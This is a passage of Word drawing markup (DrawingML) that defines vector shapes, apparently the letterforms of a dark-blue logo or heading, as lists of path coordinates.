                                  <a:pt x="17691" y="9563"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="17691" y="356"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="36373" y="356"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="36373" y="59220"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="36373" y="66954"/>
                                  <a:pt x="35636" y="72746"/>
                                  <a:pt x="34163" y="76568"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="32702" y="80404"/>
                                  <a:pt x="30645" y="83414"/>
                                  <a:pt x="27991" y="85598"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="25336" y="87770"/>
                                  <a:pt x="21793" y="89484"/>
                                  <a:pt x="17374" y="90716"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="12941" y="91948"/>
                                  <a:pt x="7341" y="92570"/>
                                  <a:pt x="571" y="92570"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="92521"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="79251"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11506" y="77254"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="13259" y="76352"/>
                                  <a:pt x="14592" y="74892"/>
                                  <a:pt x="15494" y="72872"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="16104" y="71425"/>
                                  <a:pt x="16408" y="68770"/>
                                  <a:pt x="16408" y="64897"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="16408" y="55334"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="13424" y="58871"/>
                                  <a:pt x="10052" y="61525"/>
                                  <a:pt x="6290" y="63295"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="64636"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="51675"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11722" y="46965"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="15087" y="43650"/>
                                  <a:pt x="16764" y="38735"/>
                                  <a:pt x="16764" y="32232"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="16764" y="25438"/>
                                  <a:pt x="15151" y="20396"/>
                                  <a:pt x="11938" y="17094"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="12267"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="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84" name="Shape 84"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2644903" y="331443"/>
                            <a:ext cx="31363" cy="21230"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="31363" h="21230">
                                <a:moveTo>
                                  <a:pt x="31363" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="31363" y="13035"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="31255" y="13013"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="27711" y="13013"/>
                                  <a:pt x="24930" y="13622"/>
                                  <a:pt x="22949" y="14842"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="20955" y="16048"/>
                                  <a:pt x="19342" y="18182"/>
                                  <a:pt x="18123" y="21230"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="18385"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2045" y="12047"/>
                                  <a:pt x="5550" y="7348"/>
                                  <a:pt x="10516" y="4301"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="31363"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85" name="Shape 85"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2959838" y="358407"/>
                            <a:ext cx="33420" cy="41332"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="33420" h="41332">
                                <a:moveTo>
                                  <a:pt x="33420" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="33420" y="11369"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="23863" y="14026"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="21260" y="15639"/>
                                  <a:pt x="19964" y="17672"/>
                                  <a:pt x="19964" y="20148"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="19964" y="22574"/>
                                  <a:pt x="21006" y="24669"/>
                                  <a:pt x="23089" y="26447"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="25171" y="28212"/>
                                  <a:pt x="27826" y="29101"/>
                                  <a:pt x="31039" y="29101"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="33420" y="28388"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33420" y="39882"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25070" y="41332"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="17310" y="41332"/>
                                  <a:pt x="11189" y="39490"/>
                                  <a:pt x="6718" y="35833"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2235" y="32162"/>
                                  <a:pt x="0" y="27539"/>
                                  <a:pt x="0" y="21938"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="18230"/>
                                  <a:pt x="1016" y="14928"/>
                                  <a:pt x="3061" y="12020"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="5093" y="9124"/>
                                  <a:pt x="7950" y="6890"/>
                                  <a:pt x="11620" y="5352"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="15291" y="3803"/>
                                  <a:pt x="20574" y="2457"/>
                                  <a:pt x="27495" y="1301"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="3342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86" name="Shape 86"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2961895" y="331443"/>
                            <a:ext cx="31363" cy="21230"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="31363" h="21230">
                                <a:moveTo>
                                  <a:pt x="31363" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="31363" y="13035"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="31255" y="13013"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="27711" y="13013"/>
                                  <a:pt x="24930" y="13622"/>
                                  <a:pt x="22949" y="14842"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="20955" y="16048"/>
                                  <a:pt x="19342" y="18182"/>
                                  <a:pt x="18123" y="21230"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="18385"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2045" y="12047"/>
                                  <a:pt x="5550" y="7348"/>
                                  <a:pt x="10516" y="4301"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="31363"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87" name="Shape 87"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2728736" y="331171"/>
                            <a:ext cx="68758" cy="67081"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="68758" h="67081">
                                <a:moveTo>
                                  <a:pt x="43396" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="47803" y="0"/>
                                  <a:pt x="51829" y="698"/>
                                  <a:pt x="55474" y="2070"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="59118" y="3454"/>
                                  <a:pt x="61874" y="5220"/>
                                  <a:pt x="63741" y="7353"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="65621" y="9499"/>
                                  <a:pt x="66916" y="11925"/>
                                  <a:pt x="67653" y="14643"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="68389" y="17361"/>
                                  <a:pt x="68758" y="21247"/>
                                  <a:pt x="68758" y="26314"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="68758" y="67081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="48793" y="67081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="48793" y="33604"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="48793" y="26518"/>
                                  <a:pt x="48374" y="21945"/>
                                  <a:pt x="47511" y="19862"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="46660" y="17780"/>
                                  <a:pt x="45276" y="16166"/>
                                  <a:pt x="43358" y="15011"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="41440" y="13856"/>
                                  <a:pt x="39129" y="13284"/>
                                  <a:pt x="36436" y="13284"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="32982" y="13284"/>
                                  <a:pt x="29883" y="14109"/>
                                  <a:pt x="27127" y="15760"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="24384" y="17399"/>
                                  <a:pt x="22504" y="19583"/>
                                  <a:pt x="21488" y="22301"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="20460" y="25019"/>
                                  <a:pt x="19952" y="30048"/>
                                  <a:pt x="19952" y="37376"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="19952" y="67081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="67081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1486"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18542" y="1486"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18542" y="11125"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="25121" y="3708"/>
                                  <a:pt x="33401" y="0"/>
                                  <a:pt x="43396" y="0"/>
                                </a:cubicBezTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="101600"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="1E487A"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="88" name="Shape 88"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2676266" y="331171"/>
                            <a:ext cx="37395" cy="67118"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="37395" h="67118">
                                <a:moveTo>
                                  <a:pt x="1314" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="10217" y="0"/>
                                  <a:pt x="16846" y="927"/>
                                  <a:pt x="21203" y="2756"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="25559" y="4584"/>
                                  <a:pt x="28619" y="6908"/>
                                  <a:pt x="30398" y="9728"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="32175" y="12560"/>
                                  <a:pt x="33064" y="17729"/>
                                  <a:pt x="33064" y="25273"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="32849" y="45529"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="32849" y="51295"/>
                                  <a:pt x="33166" y="55537"/>
                                  <a:pt x="33814" y="58280"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="34449" y="61023"/>
                                  <a:pt x="35643" y="63957"/>
                                  <a:pt x="37395" y="67081"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="17647" y="67081"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="17126" y="65925"/>
                                  <a:pt x="16491" y="64224"/>
                                  <a:pt x="15729" y="61950"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="15399" y="60922"/>
                                  <a:pt x="15170" y="60249"/>
                                  <a:pt x="15018" y="59919"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="11614" y="62801"/>
                                  <a:pt x="7969" y="64960"/>
                                  <a:pt x="4083" y="66408"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="67118"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="55624"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7919" y="53251"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="10331" y="51676"/>
                                  <a:pt x="11919" y="49771"/>
                                  <a:pt x="12681" y="47498"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="13202" y="46024"/>
                                  <a:pt x="13456" y="43205"/>
                                  <a:pt x="13456" y="39039"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="13456" y="35585"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="10903" y="36322"/>
                                  <a:pt x="6852" y="37211"/>
                                  <a:pt x="1314" y="38240"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="38605"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="27236"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13456" y="24282"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13456" y="22555"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="13456" y="19215"/>
                                  <a:pt x="12516" y="16840"/>
                                  <a:pt x="10624" y="15418"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="13306"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="271"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1314"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89" name="Shape 89"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2860372" y="307701"/>
                            <a:ext cx="93891" cy="90551"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="93891" h="90551">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="21018" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="21018" y="40208"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="63500" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="91758" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="52553" y="35268"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="93891" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66688" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="38062" y="48057"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="21018" y="63195"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="21018" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="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90" name="Shape 90"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3202154" y="358407"/>
                            <a:ext cx="33420" cy="41332"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="33420" h="41332">
                                <a:moveTo>
                                  <a:pt x="33420" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="33420" y="11369"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="23863" y="14026"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="21260" y="15639"/>
                                  <a:pt x="19964" y="17672"/>
                                  <a:pt x="19964" y="20148"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="19964" y="22574"/>
                                  <a:pt x="21006" y="24669"/>
                                  <a:pt x="23089" y="26447"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="25172" y="28212"/>
                                  <a:pt x="27826" y="29101"/>
                                  <a:pt x="31039" y="29101"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="33420" y="28388"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33420" y="39882"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25070" y="41332"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="17310" y="41332"/>
                                  <a:pt x="11189" y="39490"/>
                                  <a:pt x="6718" y="35833"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2235" y="32162"/>
                                  <a:pt x="0" y="27539"/>
                                  <a:pt x="0" y="21938"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="18230"/>
                                  <a:pt x="1016" y="14928"/>
                                  <a:pt x="3060" y="12020"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="5093" y="9124"/>
                                  <a:pt x="7950" y="6890"/>
                                  <a:pt x="11620" y="5352"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="15291" y="3803"/>
                                  <a:pt x="20574" y="2457"/>
                                  <a:pt x="27495" y="1301"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="3342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91" name="Shape 91"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3117191" y="332657"/>
                            <a:ext cx="77572" cy="92215"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="77572" h="92215">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="21235" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="39281" y="46571"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="56896" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="77572" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="50927" y="63119"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="46165" y="74549"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="44425" y="78384"/>
                                  <a:pt x="42748" y="81305"/>
                                  <a:pt x="41161" y="83324"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="39573" y="85344"/>
                                  <a:pt x="37757" y="86982"/>
                                  <a:pt x="35700" y="88226"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="33630" y="89484"/>
                                  <a:pt x="31102" y="90462"/>
                                  <a:pt x="28092" y="91160"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="25083" y="91871"/>
                                  <a:pt x="21692" y="92215"/>
                                  <a:pt x="17907" y="92215"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="14072" y="92215"/>
                                  <a:pt x="10300" y="91871"/>
                                  <a:pt x="6604" y="91160"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="4839" y="77571"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="7963" y="78117"/>
                                  <a:pt x="10770" y="78384"/>
                                  <a:pt x="13284" y="78384"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="17920" y="78384"/>
                                  <a:pt x="21361" y="77190"/>
                                  <a:pt x="23584" y="74828"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="25807" y="72466"/>
                                  <a:pt x="27508" y="69443"/>
                                  <a:pt x="28702" y="65786"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="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1573" name="Shape 11573"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3085492" y="332657"/>
                            <a:ext cx="19964" cy="65595"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="19964" h="65595">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="65595"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="65595"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="101600"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="1E487A"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="93" name="Shape 93"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3204212" y="331443"/>
                            <a:ext cx="31362" cy="21230"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="31362" h="21230">
                                <a:moveTo>
                                  <a:pt x="31362" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="31362" y="13035"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="31255" y="13013"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="27711" y="13013"/>
                                  <a:pt x="24930" y="13622"/>
                                  <a:pt x="22949" y="14842"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="20955" y="16048"/>
                                  <a:pt x="19342" y="18182"/>
                                  <a:pt x="18110" y="21230"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="18385"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2045" y="12047"/>
                                  <a:pt x="5550" y="7348"/>
                                  <a:pt x="10516" y="4301"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="31362"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94" name="Shape 94"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2993258" y="331171"/>
                            <a:ext cx="37395" cy="67118"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="37395" h="67118">
                                <a:moveTo>
                                  <a:pt x="1314" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="10217" y="0"/>
                                  <a:pt x="16846" y="927"/>
                                  <a:pt x="21203" y="2756"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="25559" y="4584"/>
                                  <a:pt x="28619" y="6908"/>
                                  <a:pt x="30397" y="9728"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="32175" y="12560"/>
                                  <a:pt x="33064" y="17729"/>
                                  <a:pt x="33064" y="25273"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="32848" y="45529"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="32848" y="51295"/>
                                  <a:pt x="33166" y="55537"/>
                                  <a:pt x="33814" y="58280"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="34449" y="61023"/>
                                  <a:pt x="35642" y="63957"/>
                                  <a:pt x="37395" y="67081"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="17647" y="67081"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="17126" y="65925"/>
                                  <a:pt x="16491" y="64224"/>
                                  <a:pt x="15729" y="61950"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="15399" y="60922"/>
                                  <a:pt x="15170" y="60249"/>
                                  <a:pt x="15018" y="59919"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="11614" y="62801"/>
                                  <a:pt x="7969" y="64960"/>
                                  <a:pt x="4083" y="66408"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="67118"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="55624"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7919" y="53251"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="10331" y="51676"/>
                                  <a:pt x="11919" y="49771"/>
                                  <a:pt x="12681" y="47498"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="13202" y="46024"/>
                                  <a:pt x="13456" y="43205"/>
                                  <a:pt x="13456" y="39039"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="13456" y="35585"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="10903" y="36322"/>
                                  <a:pt x="6852" y="37211"/>
                                  <a:pt x="1314" y="38240"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="38605"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="27236"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13456" y="24282"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13456" y="22555"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="13456" y="19215"/>
                                  <a:pt x="12516" y="16840"/>
                                  <a:pt x="10623" y="15418"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="13306"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="271"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1314"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1574" name="Shape 11574"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3085492" y="307701"/>
                            <a:ext cx="19964" cy="16053"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="19964" h="16053">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="16053"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="16053"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="101600"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="1E487A"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
